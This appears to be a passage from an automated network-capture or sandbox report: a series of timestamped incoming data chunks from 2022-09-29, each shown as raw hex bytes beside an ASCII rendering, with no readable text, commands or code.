                                                                                                                                                            2022-09-29 12:45:07 UTC14082INData Raw: 00 0e 0e 23 c2 9b f1 ef b7 32 81 99 7e 8f 1e b5 dd 8f fe e1 f4 c4 9d 2c 5b 78 33 0d 1c 34 86 c4 f9 e1 89 d8 2f f3 7e 25 6e 43 74 30 79 41 75 42 48 66 aa 5a 01 0c 30 dc e6 b4 42 52 21 80 c7 7d 26 40 41 ad d5 99 1a 7b b7 a7 5f da 87 42 87 18 e3 b2 43 ee 8e 68 c0 2f 7c f7 42 de 32 8c fa ee 19 65 a3 54 61 89 64 dc 57 69 88 55 9b 0c 15 7d b2 46 78 89 6b c3 37 4e c0 70 51 ab 6f 16 da 38 09 1d a6 9c e3 1d aa c5 e0 eb c9 ae a9 39 13 2c 65 d9 1f 4f 1a 2c 09 d4 a9 97 56 b8 9f ef c3 80 22 08 4b c0 eb 78 8c a5 14 62 d2 69 0b 80 9f a6 e0 b7 54 bc 23 d7 34 88 8c ba 96 a6 24 12 a5 27 0b 68 8f 8b ee 47 db 55 51 4a d1 f2 48 22 41 ef 2d c5 5d 01 12 c2 03 e5 11 0b 89 e9 c0 be a5 92 d8 60 48 5d 89 24 42 5b 55 01 27 29 c2 56 c5 c9 13 f5 31 8b 62 2a 4d 78 71 af 17 72 4f 3b f2
                                                                                                                                                            Data Ascii: #2~,[x34/~%nCt0yAuBHfZ0BR!}&@A{_BCh/|B2eTadWiU}Fxk7NpQo89,eO,V"KxbiT#4$'hGUQJH"A-]`H]$B[U')V1b*MxqrO;
                                                                                                                                                            2022-09-29 12:45:07 UTC14098INData Raw: 15 a7 51 2e f1 26 37 56 d5 6d 1a 20 c6 32 95 44 36 05 7f bc c9 08 7d f0 37 b2 79 fc a1 e9 dc d2 65 47 3b 9d f2 d3 22 36 ef 7e 4f 2a 40 c8 1d c4 a4 6a 28 7c c1 b2 25 b3 74 61 3e 1c e8 ad 0b e0 85 c7 08 90 06 bc 01 ba cc 90 a2 90 21 f2 48 d5 01 22 89 d4 05 79 7d 4e 6d 8d d6 42 4c 6b 0e 38 78 e9 9e ae 35 42 f6 3a c7 59 e0 25 87 1e e3 41 b7 3b 30 a4 b2 70 53 28 57 05 e7 24 3c 96 3b 01 29 99 ad 6f 40 d5 85 84 df dc 5f 54 67 87 68 f0 93 a2 97 e5 12 51 f8 34 d3 c5 4b 53 42 92 90 0c f3 0c 4c 2a 28 e7 41 59 5e 80 51 0d 96 13 94 c1 5f db 22 33 fd 89 8b 39 62 d9 16 5e 4c 1b e8 eb 15 87 ca ae 6d 78 42 ca 60 b8 2e 5c fb 2c 30 71 ef 89 c6 95 a2 ad ca 62 77 c6 02 c2 7a 17 58 b9 27 bd af 96 81 70 8e 1e 2c 6a 45 17 95 17 47 a5 e2 de 37 80 91 48 6d 6d 80 c3 14 e7 95 75 a1
                                                                                                                                                            Data Ascii: Q.&7Vm 2D6}7yeG;"6~O*@j(|%ta>!H"y}NmBLk8x5B:Y%A;0pS(W$<;)o@_TghQ4KSBL*(AY^Q_"39b^LmxB`.\,0qbwzX'p,jEG7Hmmu
                                                                                                                                                            2022-09-29 12:45:07 UTC14114INData Raw: 5f 88 81 3c 9a c7 fc e4 6b af 02 d3 7e 4b 11 ef 8f 64 d0 49 bd c5 c2 a2 46 53 8d 9c ec 48 c9 5f bf 25 b7 01 c2 59 51 65 45 03 f0 93 4b 5c be 20 b5 81 27 7d 88 30 00 66 e3 31 00 08 b5 38 d1 8e 76 1f 43 37 21 ec 26 ad 4a e3 dd 5e 8f fc bc 59 25 a5 14 b5 5a 8c c1 39 c3 d9 ec c5 40 ed 81 1a 81 93 01 00 a0 ee 93 69 29 a6 21 eb 16 8d 66 5d fb a3 93 0e 42 ea 03 f8 29 e4 0c 71 1c e0 b4 6f 43 dd 0a 54 4f 12 97 07 0a 22 fa 0a 4d 9b 7f c6 31 8c b7 88 66 c5 14 91 c0 2c 28 bb 00 57 2e fd 89 eb 95 35 4f 5e b5 ed ae 91 dd a6 c5 e3 51 fe 02 48 ca 62 66 0b 6b aa 77 eb 44 5a 78 55 ce bb 6b 6d ee 0e 59 e4 94 b2 c1 bf 9f 04 4b 56 af 94 81 5b 55 4f 9b 7d ac 09 cf f7 b4 a4 ac 6c 0e 53 27 95 6b 48 9f ac 5c b2 5b df 5b 95 7d c3 ab fe a1 f4 f9 51 6c 35 89 94 31 f5 36 f1 00 1f 97
                                                                                                                                                            Data Ascii: _<k~KdIFSH_%YQeEK\ '}0f18vC7!&J^Y%Z9@i)!f]B)qoCTO"M1f,(W.5O^QHbfkwDZxUkmYKV[UO}lS'kH\[[}Ql516
                                                                                                                                                            2022-09-29 12:45:07 UTC14130INData Raw: e9 96 f9 be e3 1e ad da 63 ac cc f5 b1 42 a0 e0 f4 59 15 f4 5b c9 53 bc c0 5e fe d1 ea 00 a5 30 7a 5f 1f 5b 5e 54 2d 6b ab 0c fa f7 92 cc ca 5c f2 2b 11 7d 29 b1 04 68 51 90 5c 91 c1 67 2a f8 b9 68 63 a2 59 e2 ee ad a9 7a d0 45 84 73 19 d2 50 81 0b 37 ca c9 9d 3b 65 a9 d4 50 1a f1 f6 a4 7c 5d b8 df d6 99 e5 01 c0 6d 1e c5 4f 58 47 07 02 7d b4 a3 e6 2b a9 f7 c5 f3 34 48 96 89 59 40 a8 b7 ab 34 8e 08 0b 49 6e ae 11 13 c8 4a 39 85 01 1a 1f c8 84 49 d9 29 f3 55 64 5e c2 4f 6f 0e ab 14 e9 4f a5 fe 8d fe 31 cd 89 ca 01 35 8f 5a b7 14 6f a9 c1 0a 52 1d a9 fc c9 79 d4 74 3b dc 17 57 42 ce 51 ba 50 b3 3c 7d 08 4b 81 37 59 d4 1d fd 40 6b c1 d8 de e9 64 27 11 27 7a 44 eb e9 86 d6 37 48 97 60 94 a5 25 db e6 85 2b 85 9b 18 6e 2e 17 bf b7 7f 48 45 dd 0b b7 ec d7 a0 6a
                                                                                                                                                            Data Ascii: cBY[S^0z_[^T-k\+})hQ\g*hcYzEsP7;eP|]mOXG}+4HY@4InJ9I)Ud^OoO15ZoRyt;WBQP<}K7Y@kd''zD7H`%+n.HEj
                                                                                                                                                            2022-09-29 12:45:07 UTC14146INData Raw: f8 a0 6f be 4a d8 32 5f 60 f5 92 0c 83 d9 c9 f3 af 60 7e 16 dd b9 e9 7e 7f 8e eb 74 db 32 b0 72 ba 32 cd 25 b9 7b ba 49 08 32 10 05 89 46 51 a8 76 f5 b1 c3 9e 13 47 35 8a b3 0a 0f 94 7b 1f db c7 46 48 eb 86 9b 45 5d 86 1c a0 77 1e e3 63 c8 cf cb 5a a4 85 b7 7b 85 df 51 75 fc 53 b4 10 17 b0 35 13 fc bd b5 e5 81 e1 eb b3 de e5 89 75 6b 6c 49 2b 81 af fc 3c cc d6 e8 d5 52 cf 73 3d d4 08 ef db 9e 45 4c 92 b8 6b 52 0d 55 23 e9 1d 46 9b 69 05 72 0d 99 2c 0e 76 dd cf e1 43 88 ec 24 aa f2 c8 fd a9 1f 06 5c 5f 1e 8e fb 89 20 b6 1e 48 8c 4e a2 f9 f5 13 57 8e 3a 29 bf 27 ab 31 18 a2 25 56 03 c0 3f 38 0e 58 f6 66 1e c1 d0 5c 44 b9 d0 13 4a 1f da b9 c9 87 af fb 60 6c f0 8e a8 3b 6b 21 f9 5f 16 01 60 55 05 21 1e 4c c1 7d aa 3d dc d3 4e 0e 09 14 c7 ea a1 94 a2 a5 ee c5
                                                                                                                                                            Data Ascii: oJ2_``~~t2r2%{I2FQvG5{FHE]wcZ{QuS5uklI+<Rs=ELkRU#Fir,vC$\_ HNW:)'1%V?8Xf\DJ`l;k!_`U!L}=N
                                                                                                                                                            2022-09-29 12:45:07 UTC14162INData Raw: d4 07 29 4f e2 97 b8 7b 09 75 fc 20 4f 42 f7 e9 7a f5 08 ca fb 82 6d bc a9 07 a6 ce 94 ff fe 96 73 46 0b 88 0f 95 d8 fe bc d4 87 3f b3 a8 bd 68 00 83 29 12 26 47 6c 4a 96 ef d3 20 9f 3b 22 7c ca b8 00 d8 a7 43 c0 c4 39 8b 30 c1 d8 75 ec 98 7f 8e 85 45 fd df 8d 3a ae 40 5c 0c 2e e9 cd ef 13 68 2a c9 c2 19 80 3b 89 50 ce 10 c9 57 68 e2 07 b2 5e 06 c9 6f d5 8a e4 f7 67 dd 6a 16 23 e5 7c 9a fa 44 db 4b 01 c8 0b 70 15 d7 82 ef 07 6d b6 b2 d8 ad ce 00 3f c2 af 81 98 8b 3e 82 84 25 47 ab d9 35 7e d7 7d 60 e5 66 0a aa d7 25 5c 84 d5 5e 51 24 a4 21 e9 43 3f 23 5c d0 f2 2a 54 0d 46 1b af 7e 15 8b 71 c1 29 e9 69 0c cd 8b 58 e3 0b 87 fa 9a 46 07 e1 0a fd d9 a3 88 a8 3d 97 7a ac 88 76 41 b9 be fa ab 53 ff e8 39 9d cc 55 59 58 72 c4 df 86 6b 4f 19 ea d5 ec 9a 02 2c a2
                                                                                                                                                            Data Ascii: )O{u OBzmsF?h)&GlJ ;"|C90uE:@\.h*;PWh^ogj#|DKpm?>%G5~}`f%\^Q$!C?#\*TF~q)iXF=zvAS9UYXrkO,
                                                                                                                                                            2022-09-29 12:45:07 UTC14178INData Raw: 22 21 bd e9 cb 1b fe 83 d6 5c d3 c9 79 7a 7d ca 88 5d 0d 1f de 64 7c cf 42 73 ea 59 0d cb 2a 19 ae 8b 99 40 9a 9a 6c f7 07 b0 87 4f 81 6e 6b 2a 45 4b b9 65 27 70 5c 6f 2f 7c 6a 91 68 99 71 b8 ef c2 ab f5 cb 84 c6 fb 92 04 65 e8 55 16 a4 a3 01 35 b5 3e 5c f8 a0 61 7e b0 69 3b 4e a1 59 66 db e7 51 98 3c 3e d9 78 3c 68 39 1c 04 a1 ff 96 5b 08 3c 06 bf 25 a6 34 c9 7b ed ae 39 49 c4 1f fe 5b a6 93 18 f0 0f ff b4 74 0b ca 81 02 a4 d6 e7 be ca b5 a2 88 ca 71 ee bd 04 81 ee 47 ba 0e 6e d2 0d d5 10 ed 88 fd 2f 85 b6 de 94 5a 1c a8 f7 ae 3b 46 8b ea da 06 8e 3e de 2c 07 1b f6 7a 42 f3 c5 f4 9a 69 ab 99 f6 bf 62 e6 42 67 d6 30 a5 64 73 18 83 80 e8 39 e3 b6 1e ff a3 0b 36 54 fd 8b a3 b7 71 bf 58 89 36 f5 9a 48 48 76 ca 9d 5f 3d ae 7a aa f9 60 87 5b 17 3f 1e 73 ee 27
                                                                                                                                                            Data Ascii: "!\yz}]d|BsY*@lOnk*EKe'p\o/|jhqeU5>\a~i;NYfQ<>x<h9[<%4{9I[tqGn/Z;F>,zBibBg0ds96TqX6HHv_=z`[?s'
                                                                                                                                                            2022-09-29 12:45:07 UTC14194INData Raw: 58 5d 83 46 7e 56 82 79 2d 60 21 a8 10 94 af e0 0e 0f 3c 98 4b 0e 8a 2f ad c8 32 42 2f dd ea d4 f8 c9 9f 23 5d 60 30 ea a1 f6 b0 e7 9f 53 dd c8 91 5f d0 0a bc 99 c5 b6 0a 5c 23 e6 1a 65 e0 cf da 89 76 2c 2c e7 0d 07 47 c8 77 6c 9f 6a 88 08 53 b9 de d9 a4 a8 91 1d fe 57 44 d5 1c 3e e9 0f c4 88 46 b5 f9 c2 82 14 29 43 f1 34 ea e1 14 6a ca df ee 9c 6d 95 c8 82 b8 d1 0c ab b7 72 ba ef fa d3 46 01 63 ad 31 88 13 0e d1 aa 06 25 4c f6 f8 f7 e2 3d 01 1c cd c8 8e 81 7a f3 31 54 7f a7 d8 c7 98 c0 8a 75 3f e2 9e 75 44 32 57 6f 28 69 3f 48 f5 9e 8b 89 c3 f1 e2 fc 12 d2 5d 86 78 eb 45 11 d2 49 5c e6 50 5b e7 f8 77 25 fa a7 a0 71 45 2d e5 12 1e be 9a 9a f4 4c a9 07 d7 bd 75 4e 6e db 85 c4 05 42 6d 7f 31 b7 79 a2 2a c4 f9 e0 f6 dd e1 91 f6 ea 98 c7 9b fb 41 a5 71 44 dc
                                                                                                                                                            Data Ascii: X]F~Vy-`!<K/2B/#]`0S_\#ev,,GwljSWD>F)C4jmrFc1%L=z1Tu?uD2Wo(i?H]xEI\P[w%qE-LuNnBm1y*AqD
                                                                                                                                                            2022-09-29 12:45:07 UTC14210INData Raw: 48 f8 be 2d 03 49 3b f1 f8 86 3f 22 28 7e 5a 1a 3d e7 31 19 93 4d 76 d5 9d 6f aa 52 f7 a6 d8 3c 8e 64 71 36 32 f4 12 37 ef ce e7 7f de 33 4c 8f b9 76 11 fd 84 5e 4b fb 54 5a e1 35 ab 28 d8 9b 9b e7 2e b5 f1 6f 4b af 16 7e e7 a8 14 33 db 59 8a 9e af 91 a9 ef a4 43 8e 3a 04 23 05 0a b0 85 6c e1 cd 5f b1 a8 5b df 07 a4 e6 96 57 f8 1b 21 fc ad 9d af cf 27 27 1d c7 38 79 ab 1a 18 da 86 d4 33 e2 a5 ee 07 2d f5 e8 b4 b4 7a 45 5b cc 8d 8b 81 a8 8d 4d 14 bf 04 60 d1 5b e0 8f 88 f3 57 2c 6e f0 96 75 5c a5 4e 89 ee fe f0 0a 10 20 4d 59 c0 57 b3 9e 54 d4 13 c9 9d c4 1f c2 3d 9c 73 b3 ba 99 d2 6e 76 3a bc 51 6e f7 2c 65 f5 ea 68 ad 41 6a 1e 3f a2 36 68 1e a1 7c 9d 4d 6b 8a 90 5e ae df 73 14 07 25 d1 ba f9 ff 1d a6 78 3f 3b dd fb 59 d1 ef 32 86 3d b7 c0 61 37 6a b3 e8
                                                                                                                                                            Data Ascii: H-I;?"(~Z=1MvoR<dq6273Lv^KTZ5(.oK~3YC:#l_[W!''8y3-zE[M`[W,nu\N MYWT=snv:Qn,ehAj?6h|Mk^s%x?;Y2=a7j
                                                                                                                                                            2022-09-29 12:45:07 UTC14226INData Raw: 4a 50 f3 64 89 94 90 c7 a8 e0 51 70 2c 1d cf 9d 61 e2 8c f8 f1 aa 9b 5d 26 a1 6d d9 8d 54 9a 62 c8 3d 6a 62 62 4e da 06 e4 af 86 af e3 9b 5c 74 4f 07 97 03 db bb 0b 50 0f 92 6a 3d 5b e1 c8 83 04 6b 57 0c d5 b7 f6 05 6d 5e fd 9c 79 25 d9 6b 97 a0 a9 ea 0a 69 cb 97 fb 5c 78 86 aa f7 08 f7 9d 55 e1 ab 2c f2 38 02 5e 03 e0 8a 63 a9 76 0e e6 c8 d5 e3 b3 43 99 44 00 80 1f c7 83 e0 04 6c ab 28 eb 61 ef 59 e3 86 0e d2 f0 34 ed 20 e7 18 6f a9 4c 73 bf 4b fc c3 5e d1 a6 d6 22 90 d2 cf 69 10 91 a6 66 18 80 71 6c 79 d9 61 02 f4 ff 55 f0 34 a6 8e 82 0f 1a c5 eb 6d 5d 73 04 56 62 45 ab a6 af 3b da 8e 2f a3 45 00 ee 70 10 c8 c8 b2 3e 25 c3 a3 8b b3 06 67 8a bf 11 20 3b 65 dc 05 74 b9 1c 44 b8 72 87 38 8e a6 f3 ea 59 4a 8c 97 1f 27 a2 9f 15 5a eb da ef a3 13 5f ba 15 bd
                                                                                                                                                            Data Ascii: JPdQp,a]&mTb=jbbN\tOPj=[kWm^y%ki\xU,8^cvCDl(aY4 oLsK^"ifqlyaU4m]sVbE;/Ep>%g ;etDr8YJ'Z_
                                                                                                                                                            2022-09-29 12:45:07 UTC14242INData Raw: 51 eb 2a 1a 8b f7 b7 83 6f d8 02 98 5f a3 f4 bc 8a c2 29 4c 68 bd cb f8 7e b2 4b 85 20 11 3d cd 03 bc 4b 2d 36 5f 54 33 52 01 8d 09 9c 1e 10 e7 a2 53 de a2 65 b6 d6 27 45 69 67 7e ec 80 29 f0 ac 91 d2 fc cc 5e 45 c4 ab 8b 9e 33 db cb 91 d3 68 e0 de d9 28 49 2f 7f 37 e7 2b 83 fd 5d 9e 03 63 da b4 87 c7 a2 cb 64 b7 87 22 1b 97 ce 44 f6 52 ce cd 3b 6c 3f e7 14 fd d5 ab 6f 59 f8 6b c2 59 05 87 af b6 a6 d9 9a f8 b3 e1 c6 1a 06 f5 86 a6 37 ce 04 ee 68 0f 40 2d 39 2f 5b 34 b1 d2 38 86 7c 10 88 56 aa f1 ef f1 bc bf 04 ac dd 4e 9e 10 00 46 9b d7 80 52 02 d9 ae ec 54 b0 72 cd b3 d7 d1 e2 2f a5 5b 30 79 b6 6f 0f 8b fb d4 b2 5f c9 00 28 4d 7b 5b fc b0 ea e9 33 2c 47 0e e5 84 1a 06 f2 b0 aa 9d fc fc f2 2b 2e 9d 5e 42 cb f4 11 5c 50 ea d4 8a 5c 5c 1f 2b a2 29 ee 76 e6
                                                                                                                                                            Data Ascii: Q*o_)Lh~K =K-6_T3RSe'Eig~)^E3h(I/7+]cd"DR;l?oYkY7h@-9/[48|VNFRTr/[0yo_(M{[3,G+.^B\P\\+)v
                                                                                                                                                            2022-09-29 12:45:07 UTC14252INData Raw: 3c 5a c1 bf 2e f8 13 30 0e 18 6e e1 ba f0 10 5c 6f 4f 36 ae c2 6a 07 75 ad 83 6c 59 d9 59 91 1a 00 14 d1 d1 9e c6 26 c4 ae c7 f8 6e 1f 9b 84 e9 de e0 a3 9b 2c b1 2a 5d 88 f9 2b ee 67 f1 f1 5a 81 b4 9a 36 e4 96 48 cb 16 1d ad 15 66 3b 7b dd 69 96 65 b7 b2 e6 06 24 5f 4c 90 40 5e 7d 9a 4b 79 9e 41 9e 8b c6 3b 59 aa 63 40 cc c7 22 29 ea 41 a5 ad 11 ef 0c 6c 72 b6 47 c4 58 fd 44 2a 2f 4b 61 12 40 54 6e 2c b4 af 8b d5 74 0c ae b8 14 28 05 ff ef ce 52 9b 7c 61 9d 18 98 91 3b 7d 23 d2 b9 e4 41 75 84 6d 5d 64 20 bc 56 95 5a 25 2f 30 f0 d4 e7 18 a2 16 2d ab 90 7d b4 86 ef 33 5e ea 1f de ee 8d 91 34 48 82 c6 1b 05 19 f0 3a 5e 7d c9 7d 64 dd aa 22 3b 11 02 6d ea cd 3a 14 eb 18 76 f0 79 12 fa 9d fa 92 a7 b4 13 ec 72 1c 4f fa 4e f8 08 e9 bf 36 e9 14 7d 6a 41 0d 8c f3
                                                                                                                                                            Data Ascii: <Z.0n\oO6julYY&n,*]+gZ6Hf;{ie$_L@^}KyA;Yc@")AlrGXD*/Ka@Tn,t(R|a;}#Aum]d VZ%/0-}3^4H:^}}d";m:vyrON6}jA
                                                                                                                                                            2022-09-29 12:45:07 UTC14268INData Raw: 47 6e 89 c2 dc 6b cc f1 6e a6 16 99 2b a5 a1 56 dc 91 be 95 ab fc 11 e6 d8 e4 60 94 aa 91 4e d6 e4 02 8f e8 4b 33 d6 4a ab 47 f7 7c 78 ed 64 9a 4f 9b 0c c7 66 17 a9 3c d2 7f 08 b2 4d 94 f0 2b bc ad dc 04 a5 42 26 de 90 27 61 76 4c 6d 1b c2 e0 85 17 98 55 69 f2 30 75 b7 34 c4 1a b8 3a 2e b2 9f 44 9e fb 50 80 eb 20 6d dc 1f fa 30 fb 32 b1 bc b8 b7 06 ba 76 63 d5 87 9f 05 f8 b1 bd 81 cb 43 88 9e 4c 39 ca 87 33 11 ba ba 6c d6 6b e3 3d 8f 00 f3 95 07 3d b6 5b 4e 67 ca 3b b8 9d 4f 2a a3 f7 43 8b 6e 41 b0 81 ec f7 6c 11 31 10 45 24 24 70 a4 fc e2 52 80 82 fa 13 3b fa cd 47 1e ee dc 0c d0 67 f9 1b 39 85 c3 09 87 e6 16 a5 62 99 ff ce ca 8c 10 eb 3c 77 1a d2 6d 18 86 0c dc ef 33 c3 db 9c aa 04 65 e1 bf 37 fc 07 0d 03 72 71 46 22 05 4c e0 f2 f3 6f 98 ff 13 48 07 26
                                                                                                                                                            Data Ascii: Gnkn+V`NK3JG|xdOf<M+B&'avLmUi0u4:.DP m02vcCL93lk==[Ng;O*CnAl1E$$pR;Gg9b<wm3e7rqF"LoH&
                                                                                                                                                            2022-09-29 12:45:07 UTC14284INData Raw: 73 de df 1f 87 46 fc 89 1e 96 2a 58 55 9f c5 17 2a ed a8 f6 2b 24 a7 b2 71 2f 13 57 b1 9d d3 b5 b4 c7 b8 89 e4 90 07 66 0d 07 a1 5c 49 1f 21 24 6e 86 93 70 26 50 56 93 54 8e 85 6c 52 61 1b d6 4d b8 eb 9f e2 8d 65 3e 6f da 75 56 f7 e5 df 38 5a f5 0e 80 1c e4 bb 99 95 9b 73 61 44 0b 50 45 cc 61 19 c0 24 c6 55 a2 bf f4 81 94 59 b7 46 13 05 ba 10 c6 6b 01 e8 26 b6 db 2f 93 00 7a 37 18 95 d1 4b 2c b9 cc 3f fe b4 35 cd c3 01 10 a6 1f 86 ed 76 bb 89 ff 11 3c 00 b5 3b 62 ad 6d 32 7b f2 78 74 19 b1 b6 95 8a 11 b0 d3 cd 16 b1 42 56 a8 b5 71 29 46 1f a6 e4 75 c5 9c 9a d0 21 1c 56 b5 5a 74 fb e0 41 e5 86 55 87 a1 c4 55 2e 67 82 6e 2b 5e a1 3d a2 cc 8d 73 02 69 59 cf ad ed dc d9 34 06 d9 26 c4 0d 5e 2a 9d a4 7d 5f fa 67 15 2f 3f ac 82 66 15 9f 2c f9 88 42 6f c0 4a b6
                                                                                                                                                            Data Ascii: sF*XU*+$q/Wf\I!$np&PVTlRaMe>ouV8ZsaDPEa$UYFk&/z7K,?5v<;bm2{xtBVq)Fu!VZtAUU.gn+^=siY4&^*}_g/?f,BoJ
                                                                                                                                                            2022-09-29 12:45:07 UTC14300INData Raw: 2e 6a a1 82 58 fc 1f 5a 27 74 1a 7c 0a 03 44 8e e8 ea d8 8f 51 c7 7c a8 d2 9d 6c 9b 44 0e 76 31 49 45 52 27 03 f1 ce 62 bf 83 39 c6 65 b8 ea 0b d3 2d 92 f6 2f 9e 1c d8 52 f1 70 2b b2 69 49 e3 5f 9d 74 16 a3 9a 5d 31 2a fa ce 4b 1b 47 db c7 c0 42 cd 93 58 90 f4 98 1c 68 0f d4 eb 3f 51 5f 0f 74 29 14 38 51 1a e2 f5 90 ce 14 a1 51 d9 44 62 37 69 19 bc 56 2f 73 d1 6d f9 79 58 d1 bc b4 84 5c 75 fe fd 16 1c 0b b1 0c 8d c8 fb 58 a4 3b d7 35 af 95 b7 e9 fb 83 5d b3 3b ba a8 06 61 27 f3 40 fc 06 68 63 af 75 22 1f e3 1f 9c a1 8c 9c 31 5b 00 b2 4d f0 83 3a d8 0e 32 1b fd f2 f5 cd d3 8f de 48 6b 24 96 84 2e f1 49 a7 6d 83 67 83 17 51 2f 56 c2 c2 21 50 1e 8a b4 d8 09 9f a6 6f 90 44 11 a7 b7 57 bc 02 ce b3 58 c7 ec 53 72 16 5a 38 15 7e 90 45 da ab 90 35 48 95 0d 3f 5a
                                                                                                                                                            Data Ascii: .jXZ't|DQ|lDv1IER'b9e-/Rp+iI_t]1*KGBXh?Q_t)8QQDb7iV/smyX\uX;5];a'@hcu"1[M:2Hk$.ImgQ/V!PoDWXSrZ8~E5H?Z
                                                                                                                                                            2022-09-29 12:45:07 UTC14316INData Raw: 19 eb e2 52 a6 70 ed 54 ac b4 6a 10 0e 02 14 50 b5 e4 70 c5 a5 f4 8f a2 19 83 38 bf 2f 2e ef 44 23 61 09 21 17 a6 5b 04 da 47 0e 98 4c 82 b8 84 3b 34 f7 28 55 f0 4e 66 53 69 de 60 c7 0f af 9e 9f 64 f0 aa 41 b8 d4 dd 4d b4 5f ee fd 4a bb 85 47 9b 01 35 63 41 34 bb 45 b0 59 04 69 79 97 d8 23 2d 13 fe 60 0a d8 d6 5d f6 0a e7 60 27 e1 5f 7c e6 a1 25 2c 97 5d 5d f7 7f 94 51 13 3b ac 04 dd 73 a8 d7 ee f6 75 cc 10 41 47 6a c5 30 a7 2b 26 54 0e 74 92 97 94 ba 1a 72 14 da e5 96 a5 a9 cd 70 c0 b5 f2 78 34 84 e8 14 fb cc b7 3f 3c 8e 20 01 e6 75 08 aa 0f 31 2e 5f 4d af 72 fd 0b b5 c3 c8 9a 1f bb b9 ed 4e 2d 02 79 fc 49 5e dc 13 93 c7 7c 38 04 07 d6 9c 59 21 6e 9b 95 ce 33 c3 52 08 89 42 08 7e b2 7e 6e 0a 3a 77 79 77 a3 c9 38 ff d3 58 dd 51 bf 94 49 a4 fa 49 8d cf bc
                                                                                                                                                            Data Ascii: RpTjPp8/.D#a![GL;4(UNfSi`dAM_JG5cA4EYiy#-`]`'_|%,]]Q;suAGj0+&Ttrpx4?< u1._MrN-yI^|8Y!n3RB~~n:wyw8XQII
                                                                                                                                                            2022-09-29 12:45:07 UTC14332INData Raw: 14 07 17 57 35 0c d5 39 9b 7d 5c 3e 01 9f b0 4e c3 f7 05 87 dc e8 42 07 d0 8f 56 39 2c 7f 8a 96 45 48 32 65 4d 3b 21 b8 75 fb c4 65 94 ff 34 26 fc 17 5b 16 2d cf 97 9d 1e 18 de f1 55 ae ab 5f a9 b5 07 3f 0a ed 1d a7 0c 42 54 74 66 c8 87 fd d7 48 58 cf 48 57 e7 1b ed c3 e0 db 87 4a 91 13 e9 30 62 53 26 97 3c 4e 67 a0 4a 2a 56 c2 28 80 bf 3f 70 e8 e8 c2 a1 45 56 37 ad 45 ef e0 12 23 bb 45 17 2f 8b d1 56 91 7f 90 60 c7 0f fe d0 49 ab 37 89 a3 69 20 45 af 3f 37 c9 4b a0 5e 4e 7f 67 08 ed 18 3c 24 05 67 c9 77 d2 85 92 5b 9e dd 2b 17 1a 29 67 ac f9 96 7b 69 96 32 13 eb e0 b8 83 69 c3 26 23 48 fe c9 34 00 7e c7 cf d9 71 87 ae 45 0f 76 87 13 d3 6a a9 07 b0 67 e2 36 a4 07 a1 78 d0 fb da a6 27 e8 0c 72 ab b9 0c 5e b1 03 f1 8b 0d be 0d 79 8c 01 75 27 01 62 c7 9d ff
                                                                                                                                                            Data Ascii: W59}\>NBV9,EH2eM;!ue4&[-U_?BTtfHXHWJ0bS&<NgJ*V(?pEV7E#E/V`I7i E?7K^Ng<$gw[+)g{i2i&#H4~qEvjg6x'r^yu'b
                                                                                                                                                            2022-09-29 12:45:07 UTC14348INData Raw: 6b 5d c4 ad 64 b2 2b cf fe da e8 18 4b 02 4d ca 16 a7 cf 09 00 4d 59 9a db d6 b0 36 0b e2 d6 7d 0f a4 6e b8 c1 8f b7 b6 7b a8 11 45 66 03 00 39 6e 29 98 f6 a5 c5 2f b7 12 eb ad 11 5c e6 08 38 45 5a a2 f7 8b 98 18 54 84 15 c3 9a 7d a6 69 8e 9d 9f 7d a2 9d e9 cf 05 12 37 51 45 41 30 04 90 25 d0 f7 1c 99 b9 e3 76 9a 17 58 47 e0 56 96 bd 28 ba 79 c9 34 4e 6c 3c 93 6d 9a 45 e3 1a 19 be 5f f8 d1 d9 06 9a d2 f0 72 4d 1a dc 5f 89 a5 e8 df ef 11 2e cc 39 77 9e 84 02 a2 26 d6 29 c4 69 44 01 2d e4 36 4a e8 26 80 e1 5a e5 4e 2d d7 43 fa 3f 58 c2 82 97 bb 2d 13 dc 6f 47 0c b5 92 ca ad 42 f2 c9 8b 29 14 74 75 31 d0 9f e5 fa a6 96 00 f4 df ed db 35 13 02 02 ae 74 52 b9 77 95 c8 3c 90 20 f9 43 89 6d 5d 16 f9 f9 92 fe c2 46 32 ae 24 67 a7 4f cd 93 da ba af 07 f8 1a 39 00
                                                                                                                                                            Data Ascii: k]d+KMMY6}n{Ef9n)/\8EZT}i}7QEA0%vXGV(y4Nl<mE_rM_.9w&)iD-6J&ZN-C?X-oGB)tu15tRw< Cm]F2$gO9
                                                                                                                                                            2022-09-29 12:45:07 UTC14364INData Raw: 01 89 d6 78 fd 93 8c b8 83 2f 86 63 db 25 d9 55 dd 9d 54 16 d2 9d 9c e1 f0 1d 15 d6 f1 6d 02 75 5f b9 24 0d 7e 86 a7 90 95 0b 0b 95 27 31 a5 a9 14 ea e0 9f ac 36 b2 43 47 bd 2a 63 aa 13 66 80 42 71 7c f5 7d 88 a4 ad cf a8 34 1a 3f 36 94 46 95 35 a7 87 cc 5f 53 e0 91 36 d0 78 aa e7 63 a1 c7 f1 92 7c 3c f3 7d ad ec d3 1f a6 e8 98 e3 a0 4b cd 09 88 bc 35 cb ed 4b 2f 21 08 db b9 32 6a fb 44 82 b8 8f 09 af 7f 49 ea 73 02 b4 e8 5a 58 5b 6b 6b c5 34 ab e0 64 c1 d1 85 aa d1 a5 fc dc de fd 11 ee 23 91 9f cd 79 c1 64 63 d2 39 df 6e 94 cd 1f 09 d9 86 85 5c 37 de 5e ef e9 ae 90 3e 1b 5c 8c c5 a3 d7 12 20 b6 1f aa 48 f4 93 cc 70 72 18 4a fc aa 46 c8 44 16 ab f8 4e 1d 37 ba e5 92 d4 19 80 9b 21 e5 d2 2f 43 40 5b 53 52 17 4f 1d 2f df 55 8b 8f 31 a6 9e dc 06 73 ad 92 db
                                                                                                                                                            Data Ascii: x/c%UTmu_$~'16CG*cfBq|}4?6F5_S6xc|<}K5K/!2jDIsZX[kk4d#ydc9n\7^>\ HprJFDN7!/C@[SRO/U1s
